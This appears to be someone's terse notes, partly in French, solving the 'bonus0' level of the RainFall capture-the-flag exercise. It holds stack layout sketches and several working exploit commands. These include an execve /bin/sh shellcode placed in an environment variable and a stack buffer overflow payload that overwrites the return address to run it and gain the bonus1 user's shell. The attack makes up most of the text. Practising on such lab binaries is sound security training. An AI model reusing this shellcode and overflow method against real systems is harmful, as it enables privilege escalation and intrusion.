Connextion au bonus0 -> Bit NX desactive
Chech du home et des permissions du binaire -> Bit SUID bonus1
Exection du binaire -> 
"""
bonus0@RainFall:~$ ./bonus0
 -
a
 -
e
a e
"""

___ stack main
0xbffff6c8


0xbffff688 (ebp + 0x8)
___

ebp  0xbffff680

___ stack pp
0xbffff678
|
20 a3
|
ebp - 0x1c 0xbffff664
|
20 a2
|
ebp - 0x30 0xbffff650
|
40
|
0xbffff628
___
	a3			a2
|	20		|	20		|
zzzzzzzzzzzzzbbbbbbbbbbbb

|	40					|
aaaaaaaaaaaabbbbbbbbbbbbb          ' 'bbbbbbbbbb

reip 0xbffff6d3

env -i && export SHELLCODE=$(python -c 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"') && python -c 'print "Z"*25 + "\n" + "A"*4070 + "012345678" + "\xd3\xf6\xff\xbf" + "NOPQRSTUVWX"' | ./bonus0

r $(python -c 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"') < <(python -c 'print "Z"*25 + "\n" + "A"*4070 + "012345678" + "\xc5\xf8\xff\xbf" + "NOPQRSTUVWX"')

||||||||||||||||
python -c 'print "Z"*25 + "\n" + "A"*4070 + "012345678" + "\xab\xf8\xff\xbf" + "NOPQRSTUVWX"' > /tmp/s && cat /tmp/s - | `pwd`/bonus0 $(python -c 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"')
